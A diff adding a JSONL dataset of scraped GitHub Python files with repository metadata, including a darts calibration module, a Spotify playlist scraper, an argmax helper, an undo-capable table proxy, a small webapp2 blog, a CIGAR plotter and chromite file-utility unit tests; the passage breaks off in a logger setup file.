diff --git "a/2496.jsonl" "b/2496.jsonl" new file mode 100644--- /dev/null +++ "b/2496.jsonl" @@ -0,0 +1,1179 @@ +{"seq_id":"39254531070","text":"import copy\nimport dill\nimport json\nimport pickle\nfrom collections import defaultdict\nfrom core.constants import *\nfrom core.helper import ModuleParameter\nfrom core.module import Module, Input, Output\nfrom core.datatypes import CVImage, MultiImage, \\\n CollectionTrigger, JsonObject\nimport cv2 as cv\n\n\nclass MetaDataWriter(Module):\n def __init__(self):\n super().__init__()\n self.raw_images_in = Input(data_type=MultiImage, config_keys=['cam_ids'])\n self.calibrated_images_out = Output(data_type=MultiImage, config_keys=['cam_ids'])\n self.display_images_out = Output(data_type=MultiImage, config_keys=['cam_ids'])\n self.config_in = Input(data_type=JsonObject)\n\n self.calibration_trigger_out = Output(data_type=CollectionTrigger)\n self.cam_ids = ModuleParameter(None, data_type=list)\n self.defaults = {\n 'bull_location': defaultdict(lambda: 0.5, [(0, 0.487), (1, 0.50575)]),\n 'board_radius': defaultdict(lambda: 0.26, [(0, 0.26125), (1, 0.259)]),\n 'board_surface': defaultdict(lambda: 0.3, [(0, 0.269), (1, 0.3)]),\n 'roi_start': defaultdict(lambda: 0.32, [(0, 0.3), (1, 0.31)]),\n 'roi_end': defaultdict(lambda: 0.4, [(0, 0.4), (1, 0.4)]),\n }\n\n self.roi = [50, 350, 1850, 130]\n\n def process_raw_images_in(self, raw_images: MultiImage):\n processed_images = []\n display_images = []\n for raw_image in raw_images.images:\n cam_id = raw_image.camera_info['name']\n\n # todo: save all of this somewhere\n bull_x = int(raw_image.shape[1] * getattr(self, 'bull_location_%s' % cam_id))\n board_rad = int(raw_image.shape[1] * getattr(self, 'board_radius_%s' % cam_id))\n board_surface_y = int(raw_image.shape[0] * getattr(self, 'board_surface_%s' % cam_id))\n roi_start_y = int(raw_image.shape[0] * getattr(self, 'roi_start_%s' % cam_id))\n roi_end_y = int(raw_image.shape[0] * getattr(self, 'roi_end_%s' % cam_id))\n\n c_info = raw_image.camera_info\n c_info['bull'] = bull_x\n c_info['radius'] = board_rad\n c_info['board_surface_y'] = board_surface_y\n c_info['suggested_roi'] = self.roi\n c_info['calibration'] = {param: getattr(self, '%s_%s' % (param, cam_id)) for param in self.defaults.keys()}\n\n processed_images.append(CVImage(raw_image, raw_image.id, c_info))\n display_image = copy.deepcopy(raw_image)\n # bull-line\n cv.line(display_image, (bull_x, 0), (bull_x, display_image.shape[0]), (0, 255, 0), 1)\n\n for l in [RADIUS_OUTER_DOUBLE_MM, RADIUS_INNER_DOUBLE_MM, RADIUS_INNER_TRIPLE_MM,\n RADIUS_OUTER_TRIPLE_MM, RADIUS_INNER_BULL_MM, RADIUS_OUTER_BULL_MM]:\n _x = int(board_rad * (l / RADIUS_OUTER_DOUBLE_MM))\n\n # outer-double-line left\n cv.line(display_image, (bull_x-_x, 0), (bull_x-_x, display_image.shape[0]), (255, 255, 0), 1)\n # outer-triple-line left\n cv.line(display_image, (bull_x+_x, 0), (bull_x+_x, display_image.shape[0]), (255, 255, 0), 1)\n\n cv.line(raw_image, (0, board_surface_y), (display_image.shape[1], board_surface_y), (0, 255, 0), 1)\n display_images.append(CVImage(display_image, display_image.id, c_info))\n self.calibrated_images_out.data_ready(MultiImage(processed_images, raw_images.has_processing_trigger))\n self.display_images_out.data_ready(MultiImage(display_images))\n\n def process_config_in(self, config: JsonObject):\n self.log_debug('got', config.get_dict())\n cam = list(config.get_dict().keys())[0]\n for k, v in config.get_dict()[cam].items():\n self.defaults[k][int(cam)] = v\n\n print(self.defaults)\n with 
open('CALIBRATION', 'wb') as conf_file:\n pickle._dump(self.defaults, conf_file)\n\n # TODO: MAYBE SET self.defaults already\n\n def __custom_pre_start__(self):\n try:\n with open('CALIBRATION', 'rb') as conf_file:\n self.defaults = pickle.load(conf_file)\n\n except Exception as e:\n print('no calibration data found')\n print(e)\n\n # TODO: WRITE data TO self.defaults\n\n for param_name in self.defaults.keys():\n for cam_id in self.cam_ids:\n if not hasattr(self, '%s_%s' % (param_name, cam_id)):\n setattr(self, '%s_%s' % (param_name, cam_id), ModuleParameter(self.defaults[param_name][cam_id]))\n\n\n","repo_name":"ffriese/darts_rec","sub_path":"processing/metadatawriter.py","file_name":"metadatawriter.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9721615648","text":"from bs4 import BeautifulSoup\nimport requests\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nimport os\n\nClient_ID= os.environ[\"CLIENT_ID\"]\nClient_Secret= os.environ[\"CLIENT_SECRET\"]\nDirect_Uri = os.environ[\"DIRECT_URI\"]\n\n\n###Scraping songs from Billboard###\ndate =input(\"Which year do you want to travel to? Type the date in this format YYYY-MM-DD: \")\n\nurl = f\"https://www.billboard.com/charts/hot-100/{date}/\"\nresponse = requests.get(url= url)\nwebsite = response.text\n\nsoup = BeautifulSoup(website, \"html.parser\")\nfirst_song = soup.find(name=\"h3\",id=\"title-of-a-story\",class_=\"c-title a-no-trucate a-font-primary-bold-s u-letter-spacing-0021 u-font-size-23@tablet lrv-u-font-size-16 u-line-height-125 u-line-height-normal@mobile-max a-truncate-ellipsis u-max-width-245 u-max-width-230@tablet-only u-letter-spacing-0028@tablet\").getText()[14:].split(\"\\t\")[0]\nsong_titles = soup.find_all(name=\"h3\",id=\"title-of-a-story\",class_=\"c-title a-no-trucate a-font-primary-bold-s u-letter-spacing-0021 lrv-u-font-size-18@tablet lrv-u-font-size-16 u-line-height-125 u-line-height-normal@mobile-max a-truncate-ellipsis u-max-width-330 u-max-width-230@tablet-only\")\nsongs_list= [song.getText()[14:].split(\"\\t\")[0] for song in song_titles]\nsongs_list.insert(0,first_song)\n\nprint(songs_list)\n\nwith open(\"song_playlist.txt\",\"w\") as file:\n for song in songs_list:\n file.write(f\"{song}\\n\")\n\n###Authorization on Spotify####\n\nsp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id=Client_ID,\n client_secret=Client_Secret,\n redirect_uri=Direct_Uri,\n scope= \"playlist-modify-private\",\n show_dialog= True,\n cache_path=\"token.txt\"))\n\nuser_id =sp.current_user()[\"id\"]\n\n###Search for songs on Spotify####\n\nuri_song =[]\nfor song in songs_list:\n try:\n response = sp.search(q=f\"{song}\", type=\"track\",limit=1)\n uri_song.append(response[\"tracks\"][\"items\"][0][\"uri\"])\n except IndexError:\n print(f\"Song {song} not found on Spotify\")\n\n\n\n\nprint(uri_song)\n\n###Add songs to playlist###\n\nmy_playlist = sp.user_playlist_create(user=user_id,\n name=f\"{date} Billboard top 100\",\n public=False)\nmy_playlist_id=my_playlist[\"id\"]\n\n\nsp.user_playlist_add_tracks(user=user_id,\n playlist_id=my_playlist_id,\n tracks=uri_song)\n\n\n","repo_name":"LinhHoang2812/Spotif-timemachine-playlist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2160679319","text":"'''\nThis is an argmax function, taking an array as an argument\noutputs the 
index of the max value; if the array contains multiple\noccurrences of the same max value, our function selects one index randomly\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nExample:\n\nGiven a list of example_list = [1, 2, 3, 3]\nargmax(example_list) will output index 2 and index 3 with same probability\n\n\n\n'''\n\n# import in numpy\nimport numpy as np\n\n\n# let's start our function\ndef argmax(q_values):\n \"\"\"\n Takes in a list of q_values and returns the index of the item \n with the highest value. Breaks ties randomly.\n returns: int - the index of the highest value in q_values\n\n \"\"\"\n\n # to start we set the top_value as negative infinity\n top_value = float(\"-inf\")\n\n # create an empty list to store ties\n ties = []\n\n # now, let's loop through our argument q_values\n for i in range(len(q_values)):\n\n # compare the current element with our top_value, if it's higher:\n if q_values[i] > top_value:\n\n # store the q_value as the new top value\n top_value = q_values[i]\n\n # clear tie list\n ties.clear()\n\n # put the index of our new top_value in our tie list\n ties.append(i)\n\n # otherwise, if the current element equals our top_value, it is a tie\n # (elif, so the new top index above is not appended a second time):\n elif q_values[i] == top_value:\n\n # store the index of current value in our ties list\n ties.append(i)\n\n # randomly pick one index from our ties list and return it\n return np.random.choice(ties)\n","repo_name":"bosgithub/Fundamentals_of_Reinforcements_Learning","sub_path":"argmax_function.py","file_name":"argmax_function.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27811940787","text":"from qt import QObject, PYSIGNAL\n\n__all__ = ['getProxy']\n\nclass UndoStack:\n def __init__(self):\n self.reset()\n\n def reset(self):\n self._stack = []\n self._top = -1\n self._limit = -1\n \n def prev(self):\n if self._top >= 0:\n r = self._stack[self._top]\n self._top -= 1\n return r\n else:\n return None\n\n def next(self):\n if self._limit > self._top:\n self._top += 1\n return self._stack[self._top]\n else:\n return None\n \n def push(self, *args):\n self._top += 1\n if len(self._stack) == self._top:\n self._stack.append(args)\n else:\n self._stack[self._top] = args\n self._limit = self._top\n if self._limit >= 2000:\n del self._stack[0]\n self._limit -= 1\n self._top -= 1\n\n def status(self):\n return self._top+1, self._limit-self._top\n \nclass _TableRowProxy(object):\n \"\"\"\n self.num is a row index in the table\n \"\"\"\n def __setitem__(self,i,v):\n if type(i) == str:\n i = self.getColumnIndex(i)\n w = self[i]\n super(self.__class__,self).__setitem__(i,v)\n self.tab.emitter.emit(PYSIGNAL(\"cellChanged\"),(self.num,i,self.data[i],w))\n if not self.tab.undoStackReadOnly:\n self.tab.undoStack.push(\"cellChanged\",(self.num,i),(v,w))\n\n def select(self):\n self.tab.select(self.num)\n \nclass _TableModelProxy(object):\n def __init__(self, *args):\n self.super = super(self.__class__,self)\n self.super.__init__(*args)\n self.emitter = QObject()\n self.selection = None\n self.undoStack = UndoStack()\n self.undoStackReadOnly = False\n \n def setHeader(self, col, header):\n self.super.setHeader(col, header)\n self.emitter.emit(PYSIGNAL(\"setHeader\"),(col,header))\n \n def insertRow(self,i=None,row=None):\n if i is None: i=len(self.table)\n if self.super.insertRow(i,row):\n for k in range(i,len(self.table)):\n self.table[k].num = k\n self.emitter.emit(PYSIGNAL(\"insertRow\"),(i,self.table[i]))\n if not 
self.undoStackReadOnly:\n self.undoStack.push(\"insertRow\",i,row)\n return True\n else:\n return False\n \n def insertColumn(self,i=None,col=None):\n if self.super.insertColumn(i,col):\n self.emitter.emit(PYSIGNAL(\"insertColumn\"),(i,col))\n if type(i)==int and i <= self.selection:\n self.selection += 1\n return True\n else:\n return False\n \n def takeRow(self,i):\n r = self.super.takeRow(i)\n for k in range(i,len(self.table)):\n self.table[k].num = k\n if i == self.selection:\n self.selection = None\n self.emitter.emit(PYSIGNAL(\"takeRow\"),(i,r))\n if not self.undoStackReadOnly:\n self.undoStack.push(\"takeRow\",i,r)\n return r\n \n def takeColumn(self,i):\n c = self.super.takeColumn(i)\n self.emitter.emit(PYSIGNAL(\"takeColumn\"),(i,))\n if i == self.selection:\n self.selection = None\n elif i < self.selection:\n self.selection -= 1\n return c\n \n def sort(self, *args):\n self.super.sort(*args)\n for i,row in enumerate(self.table):\n row.num = i\n self.emitter.emit(PYSIGNAL(\"sort\"),())\n\n def select(self, sel):\n self.selection = sel\n self.emitter.emit(PYSIGNAL(\"select\"),(sel,))\n\n def getSelection(self):\n return self.selection\n\n def resetUndoStack(self):\n self.undoStack.reset()\n \n def undo(self, n=1):\n for m in range(n):\n try:\n op, arg1, arg2 = self.undoStack.prev()\n #print \"undo\", op, arg1, arg2\n #print len(self.undoStack._stack)\n except TypeError:\n break\n self.undoStackReadOnly = True\n if op == 'insertRow':\n self.takeRow(arg1)\n elif op == 'takeRow':\n self.insertRow(arg1,arg2)\n elif op == 'cellChanged':\n i, j = arg1\n v, w = arg2\n self[i][j] = w\n self.undoStackReadOnly = False\n \n def redo(self, n=1):\n for m in range(n):\n try:\n op, arg1, arg2 = self.undoStack.next()\n #print \"redo\", op, arg1, arg2\n #print len(self.undoStack._stack)\n except TypeError:\n break\n self.undoStackReadOnly = True\n if op == 'insertRow':\n self.insertRow(arg1,arg2)\n elif op == 'takeRow':\n self.takeRow(arg1)\n elif op == 'cellChanged':\n i, j = arg1\n v, w = arg2\n self[i][j] = v\n self.undoStackReadOnly = False\n\n def undoStackStatus(self):\n return self.undoStack.status()\n \ndef getProxy(cls):\n name = \"Proxy_TableRow\"\n bases = (cls.TableRow,) + _TableRowProxy.__bases__\n dic = dict(_TableRowProxy.__dict__)\n rowModelClass = type(name, bases, dic)\n \n name = \"Proxy_\" + cls.__name__\n bases = (cls,) + _TableModelProxy.__bases__\n dic = dict(_TableModelProxy.__dict__)\n dic['TableRow'] = rowModelClass\n \n return type(name, bases, dic)\n\n","repo_name":"nltk/nltk_contrib","sub_path":"nltk_contrib/lpath/at_lite/tableproxy.py","file_name":"tableproxy.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"52"} +{"seq_id":"13096726193","text":"#!/usr/bin/env python\nimport os\nimport webapp2\nimport jinja2\nimport time\n#import logging\n\nfrom google.appengine.ext import db\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\njinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),\n autoescape = True)\n\nclass Handler(webapp2.RequestHandler):\n def write(self, *a, **kw):\n self.response.write(*a, **kw)\n\n def render_str(self, template, **params):\n t = jinja_env.get_template(template)\n return t.render(params)\n\n def render(self,template, **kw):\n self.write(self.render_str(template, **kw))\n\n\nclass Entry(db.Model): #represents submission from user\n title = db.StringProperty(required = True) #define types of this entity\n content = 
db.TextProperty(required = True)\n created = db.DateTimeProperty(auto_now_add = True)\n\n\nclass MainHandler(Handler):\n def get(self):\n self.redirect('/blog')\n\n#####blog stuff\n\nclass MainBlog(Handler): #main front page\n def render_front_page(self,title=\"\", content=\"\"):\n contents = db.GqlQuery(\"SELECT * from Entry ORDER BY created DESC \")#run a query\n self.render(\"front.html\", title= title, content=content, contents=contents )\n\n def get(self):\n self.render_front_page()\n\n def post(self):\n title = self.request.get(\"title\")\n content = self.request.get(\"content\")\n self.response.write(title, content)\n\n\nclass Newpost(Handler): #new post page\n def render_newpostform(self, title=\"\",content= \"\",error=\"\"): #passing \"\" into template\n self.render(\"newpost.html\", title=title, content=content, error=error) #render it from templates\n\n def get(self):\n self.render_newpostform()\n\n def post(self):\n title = self.request.get(\"title\") #creating variables\n content = self.request.get(\"content\")\n\n if title and content: #creates a new instance of Content, called a\n a = Entry(title=title, content=content)\n a.put() #stores new Entry object in database\n time.sleep(1) #Nick's solution to not have to refresh\n new_route = \"/blog/\" + str(a.key().id()) #comes later\n self.redirect(new_route)\n\n else:\n error = \"We need both a title and some content\"\n self.render_newpostform(title, content, error) #pass in from line 23-24\n\n\nclass ViewPostHandler(webapp2.RequestHandler): #what's the purpose of this class?\n def get(self, id):\n blog_id = Entry.get_by_id(int(id)) #get_by_id of user input, query of database, find it by id\n # logging.info(\"test\")\n # logging.info(title)\n if blog_id == None: #find blog_id; if not there, return error\n error = \"No post associated with id.\"\n self.response.write(error)\n else:\n self.response.write(blog_id.title)\n self.response.write(\"
<br><br>
\")\n self.response.write(blog_id.content)\n\n #add something with blog_id\n # def single_new_post(self, title=\"\",content=\"\"):\n # self.render(\"single_new_post.html\", title=title, content=content)\n # self.single_new_post()\n #\n # def post(self):\n # title = self.request.get(\"title\")\n # content = self.request.get(\"content\")\n # self.response.write(title, content)\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler), #redirects to mainpage\n ('/blog', MainBlog),\n ('/newpost',Newpost),\n webapp2.Route('/blog/', ViewPostHandler) #says our route expects URLpath that starts\n], debug=True) #with /blog/ & ends with one or more digits\n","repo_name":"leem94/build-a-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18532936431","text":"import argparse\nfrom collections import namedtuple\nimport os\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom utils.bio import parse_cigar\nfrom utils.os_utils import expandpath, smart_makedirs\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\")\n parser.add_argument(\"-o\", \"--output\")\n parser.add_argument(\"--asm1-name\", default=\"\")\n parser.add_argument(\"--asm2-name\", default=\"\")\n parser.add_argument(\"--legend\", default=\"\")\n parser.add_argument(\"--title\", default=\"\")\n params = parser.parse_args()\n\n\n for input_file in params.input.split(','):\n cx, cy = 0, 0\n x, y = [cx], [cy]\n with open(input_file) as f:\n parsed_cigar, cnt = parse_cigar(f.readline())\n print(cnt)\n for len, mode in parsed_cigar:\n len = int(len)\n if mode == 'M' or mode == 'X' or mode == '=':\n cx += len\n cy += len\n elif mode == 'I':\n cy += len\n elif mode == 'D':\n cx += len\n\n x.append(cx / 1e6)\n y.append(cy / 1e6)\n\n plt.plot(x, y)\n\n if params.legend:\n plt.legend(params.legend.split(','))\n plt.xlabel(params.asm1_name)\n plt.ylabel(params.asm2_name)\n plt.title(params.title)\n plt.axis('square')\n plt.savefig(os.path.join(params.output, 'cigar.pdf'), format='pdf')\n\nmain()","repo_name":"seryrzu/unialigner","sub_path":"tandem_aligner/py/visualize_cigar.py","file_name":"visualize_cigar.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"52"} +{"seq_id":"12537346245","text":"from __future__ import print_function\n\nimport os\nimport shutil\n\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import cros_test_lib\nfrom chromite.lib import osutils\nfrom chromite.lib.paygen import filelib\nfrom chromite.lib.paygen import utils\n\n\nclass TestFileManipulation(cros_test_lib.TestCase):\n \"\"\"Test cases for filelib.\"\"\"\n\n FILE1 = 'file1a'\n FILE2 = 'file2'\n SUBDIR = 'subdir'\n SUBFILE = '%s/file1b' % SUBDIR\n FILE_GLOB = 'file1*'\n\n FILE1_CONTENTS = 'Howdy doody there dandy'\n FILE2_CONTENTS = 'Once upon a time in a galaxy far far away.'\n SUBFILE_CONTENTS = 'Five little monkeys jumped on the bed.'\n\n def _SetUpTempdir(self, tempdir):\n with open(os.path.join(tempdir, self.FILE1), 'w') as out1:\n out1.write(self.FILE1_CONTENTS)\n\n with open(os.path.join(tempdir, self.FILE2), 'w') as out2:\n out2.write(self.FILE2_CONTENTS)\n\n subdir = os.path.join(tempdir, self.SUBDIR)\n osutils.SafeMakedirs(subdir)\n\n with open(os.path.join(tempdir, self.SUBFILE), 'w') as out3:\n out3.write(self.SUBFILE_CONTENTS)\n\n def 
testIntegrationScript(self):\n dir1 = None\n dir2 = None\n try:\n dir1 = utils.CreateTmpDir('filelib_unittest1-')\n dir2 = utils.CreateTmpDir('filelib_unittest2-')\n\n self._SetUpTempdir(dir1)\n\n dir1_file1 = os.path.join(dir1, self.FILE1)\n dir1_file2 = os.path.join(dir1, self.FILE2)\n dir1_subfile = os.path.join(dir1, self.SUBFILE)\n dir1_top_files = [dir1_file1, dir1_file2]\n dir1_deep_files = dir1_top_files + [dir1_subfile]\n\n dir2_file1 = os.path.join(dir2, self.FILE1)\n dir2_file2 = os.path.join(dir2, self.FILE2)\n dir2_subdir = os.path.join(dir2, self.SUBDIR)\n dir2_subfile = os.path.join(dir2, self.SUBFILE)\n dir2_top_files = [dir2_file1, dir2_file2]\n dir2_deep_files = dir2_top_files + [dir2_subfile]\n\n # Test Exists.\n for dir1_path in dir1_deep_files:\n self.assertTrue(filelib.Exists(dir1_path))\n for dir2_path in dir2_deep_files:\n self.assertFalse(filelib.Exists(dir2_path))\n\n # Test ListFiles with various options.\n self.assertEqual(set(dir1_top_files),\n set(filelib.ListFiles(dir1)))\n self.assertEqual(set(dir1_deep_files),\n set(filelib.ListFiles(dir1, recurse=True)))\n self.assertEqual(sorted(dir1_deep_files),\n filelib.ListFiles(dir1, recurse=True, sort=True))\n self.assertEqual(set([dir1_file1, dir1_subfile]),\n set(filelib.ListFiles(dir1, recurse=True,\n filepattern=self.FILE_GLOB)))\n # Test CopyFiles from dir1 to dir2.\n self.assertEqual(set(dir2_deep_files),\n set(filelib.CopyFiles(dir1, dir2)))\n for dir2_path in dir2_deep_files:\n self.assertTrue(filelib.Exists(dir2_path))\n\n # Test Cmp.\n self.assertTrue(filelib.Cmp(dir1_file1, dir2_file1))\n self.assertTrue(filelib.Cmp(dir2_file2, dir1_file2))\n self.assertFalse(filelib.Cmp(dir1_file2, dir2_file1))\n\n # Test RemoveDirContents.\n filelib.RemoveDirContents(dir2_subdir)\n self.assertTrue(filelib.Exists(dir2_subdir, as_dir=True))\n self.assertFalse(filelib.Exists(dir2_subfile))\n filelib.RemoveDirContents(dir2)\n self.assertTrue(filelib.Exists(dir2, as_dir=True))\n for dir2_path in dir2_deep_files:\n self.assertFalse(filelib.Exists(dir2_path))\n\n filelib.RemoveDirContents(dir1)\n self.assertTrue(filelib.Exists(dir1, as_dir=True))\n for dir1_path in dir1_deep_files:\n self.assertFalse(filelib.Exists(dir1_path))\n\n finally:\n for d in (dir1, dir2):\n if d and os.path.isdir(d):\n shutil.rmtree(d)\n\n\nclass TestFileLib(cros_test_lib.MoxTempDirTestCase):\n \"\"\"Test filelib module.\n\n Note: We use tools for hashes to avoid relying on hashlib since that's what\n the filelib module uses. We want to verify things rather than have a single\n hashlib bug break both the code and the tests.\n \"\"\"\n\n def _MD5Sum(self, file_path):\n \"\"\"Use RunCommand to get the md5sum of a file.\"\"\"\n return cros_build_lib.RunCommand(\n ['md5sum', file_path], redirect_stdout=True).output.split(' ')[0]\n\n def _SHA1Sum(self, file_path):\n \"\"\"Use sha1sum utility to get SHA1 of a file.\"\"\"\n # The sha1sum utility gives SHA1 in base 16 encoding. We need base 64.\n hash16 = cros_build_lib.RunCommand(\n ['sha1sum', file_path], redirect_stdout=True).output.split(' ')[0]\n return hash16.decode('hex').encode('base64').rstrip()\n\n def _SHA256Sum(self, file_path):\n \"\"\"Use sha256 utility to get SHA256 of a file.\"\"\"\n # The sha256sum utility gives SHA256 in base 16 encoding. 
We need base 64.\n hash16 = cros_build_lib.RunCommand(\n ['sha256sum', file_path], redirect_stdout=True).output.split(' ')[0]\n return hash16.decode('hex').encode('base64').rstrip()\n\n def testMD5Sum(self):\n \"\"\"Test MD5Sum output with the /usr/bin/md5sum binary.\"\"\"\n file_path = os.path.abspath(__file__)\n self.assertEqual(self._MD5Sum(file_path), filelib.MD5Sum(file_path))\n\n def testShaSums(self):\n file_path = os.path.abspath(__file__)\n expected_sha1 = self._SHA1Sum(file_path)\n expected_sha256 = self._SHA256Sum(file_path)\n sha1, sha256 = filelib.ShaSums(file_path)\n self.assertEqual(expected_sha1, sha1)\n self.assertEqual(expected_sha256, sha256)\n\n def testCmp(self):\n path1 = '/some/local/path'\n path2 = '/other/local/path'\n\n self.mox.StubOutWithMock(filelib.os.path, 'exists')\n self.mox.StubOutWithMock(filelib.filecmp, 'cmp')\n\n # Set up the test replay script.\n # Run 1, both exist, are different.\n filelib.os.path.exists(path1).AndReturn(True)\n filelib.os.path.exists(path2).AndReturn(True)\n filelib.filecmp.cmp(path1, path2).AndReturn(True)\n # Run 2, both exist, are different.\n filelib.os.path.exists(path1).AndReturn(True)\n filelib.os.path.exists(path2).AndReturn(True)\n filelib.filecmp.cmp(path1, path2).AndReturn(False)\n # Run 3, second file missing.\n filelib.os.path.exists(path1).AndReturn(True)\n filelib.os.path.exists(path2).AndReturn(False)\n self.mox.ReplayAll()\n\n # Run the test verification.\n self.assertTrue(filelib.Cmp(path1, path2))\n self.assertFalse(filelib.Cmp(path1, path2))\n self.assertFalse(filelib.Cmp(path1, path2))\n self.mox.VerifyAll()\n\n def testCopy(self):\n path1 = '/some/local/path'\n path2 = '/other/local/path'\n relative_path = 'relative.bin'\n\n self.mox.StubOutWithMock(filelib, 'Exists')\n self.mox.StubOutWithMock(osutils, 'SafeMakedirs')\n self.mox.StubOutWithMock(filelib.shutil, 'copy2')\n\n # Set up the test replay script.\n # Run 1, path2 directory exists.\n filelib.Exists(os.path.dirname(path2), as_dir=True).AndReturn(True)\n filelib.shutil.copy2(path1, path2)\n # Run 2, path2 directory does not exist.\n filelib.Exists(os.path.dirname(path2), as_dir=True).AndReturn(False)\n osutils.SafeMakedirs(os.path.dirname(path2))\n filelib.shutil.copy2(path1, path2)\n\n # Run 3, there is target directory is '.', don't test existence.\n filelib.shutil.copy2(path1, relative_path)\n self.mox.ReplayAll()\n\n # Run the test verifications, three times.\n filelib.Copy(path1, path2)\n filelib.Copy(path1, path2)\n filelib.Copy(path1, relative_path)\n self.mox.VerifyAll()\n\n def testSize(self):\n path = '/some/local/path'\n size = 100\n\n self.mox.StubOutWithMock(filelib.os.path, 'isfile')\n self.mox.StubOutWithMock(filelib.os, 'stat')\n\n # Set up the test replay script.\n # Run 1, success.\n filelib.os.path.isfile(path).AndReturn(True)\n filelib.os.stat(path).AndReturn(cros_test_lib.EasyAttr(st_size=size))\n # Run 2, file not found.\n filelib.os.path.isfile(path).AndReturn(False)\n self.mox.ReplayAll()\n\n # Run the test verification.\n self.assertEqual(size, filelib.Size(path))\n self.assertRaises(filelib.MissingFileError, filelib.Size, path)\n self.mox.VerifyAll()\n\n def testExists(self):\n path = '/some/local/path'\n result = 'TheResult'\n\n self.mox.StubOutWithMock(filelib.os.path, 'isdir')\n self.mox.StubOutWithMock(filelib.os.path, 'isfile')\n\n # Set up the test replay script.\n # Run 1, as file.\n filelib.os.path.isfile(path).AndReturn(result)\n # Run 2, as dir.\n filelib.os.path.isdir(path).AndReturn(result)\n 
self.mox.ReplayAll()\n\n # Run the test verification.\n self.assertEqual(result, filelib.Exists(path))\n self.assertEqual(result, filelib.Exists(path, as_dir=True))\n self.mox.VerifyAll()\n\n def _CreateSimpleFile(self, *args):\n contents = 'Not important, can be anything'\n for path in args:\n with open(path, 'w') as out:\n out.write(contents)\n\n def testRemove(self):\n # pylint: disable=E1101\n path1 = os.path.join(self.tempdir, 'file1')\n path2 = os.path.join(self.tempdir, 'file2')\n missing_path = os.path.join(self.tempdir, 'missing')\n subdir = os.path.join(self.tempdir, 'subdir')\n subpath1 = os.path.join(subdir, 'file3')\n subpath2 = os.path.join(subdir, 'file4')\n\n # Test remove on path that does not exist.\n self.assertRaises(filelib.MissingFileError, filelib.Remove, path1)\n self.assertFalse(filelib.Remove(path1, ignore_no_match=True))\n\n # Test remove on simple file.\n self._CreateSimpleFile(path1)\n self.assertTrue(filelib.Remove(path1))\n self.assertRaises(filelib.MissingFileError, filelib.Remove, path1)\n self.assertFalse(filelib.Remove(path1, ignore_no_match=True))\n\n # Test remove on more than one file.\n self._CreateSimpleFile(path1, path2)\n self.assertTrue(filelib.Remove(path1, path2))\n\n # Test remove on multiple files, with one missing.\n self._CreateSimpleFile(path1, path2)\n self.assertRaises(filelib.MissingFileError, filelib.Remove,\n path1, missing_path, path2)\n # First path1 removed, but path2 not because it was after missing.\n self.assertFalse(filelib.Exists(path1))\n self.assertTrue(filelib.Exists(path2))\n\n # Test remove multiple files, one missing, with ignore_no_match True.\n self._CreateSimpleFile(path1, path2)\n self.assertFalse(filelib.Remove(path1, missing_path, path2,\n ignore_no_match=True))\n self.assertFalse(filelib.Exists(path1))\n self.assertFalse(filelib.Exists(path2))\n\n # Test recursive Remove.\n os.makedirs(subdir)\n self._CreateSimpleFile(path1, path2, subpath1, subpath2)\n self.assertTrue(filelib.Remove(path1, path2, subdir, recurse=True))\n self.assertFalse(filelib.Exists(path1))\n self.assertFalse(filelib.Exists(subpath1))\n\n # Test recursive Remove with one missing path.\n os.makedirs(subdir)\n self._CreateSimpleFile(path1, path2, subpath1, subpath2)\n self.assertRaises(filelib.MissingFileError, filelib.Remove,\n path1, subdir, missing_path, path2, recurse=True)\n self.assertFalse(filelib.Exists(path1))\n self.assertTrue(filelib.Exists(path2))\n self.assertFalse(filelib.Exists(subpath1))\n\n # Test recursive Remove with one missing path and ignore_no_match True.\n os.makedirs(subdir)\n self._CreateSimpleFile(path1, path2, subpath1, subpath2)\n self.assertFalse(filelib.Remove(path1, subdir, missing_path, path2,\n recurse=True, ignore_no_match=True))\n self.assertFalse(filelib.Exists(path1))\n self.assertFalse(filelib.Exists(path2))\n self.assertFalse(filelib.Exists(subpath1))\n","repo_name":"kiwibrowser/src","sub_path":"third_party/chromite/lib/paygen/filelib_unittest.py","file_name":"filelib_unittest.py","file_ext":"py","file_size_in_byte":11485,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"32593615026","text":"import logging\nimport os\nfrom datetime import datetime\nfrom pathlib import Path\nfrom datetime import timedelta\nfrom time import time\n\nFOLDER = 'logs'\n\ndef setup_logger(level):\n logger = logging.getLogger('default')\n logger.setLevel(level)\n _log_format = f\"[%(levelname)s] %(filename)s %(funcName)s(%(lineno)d): %(message)s\"\n 
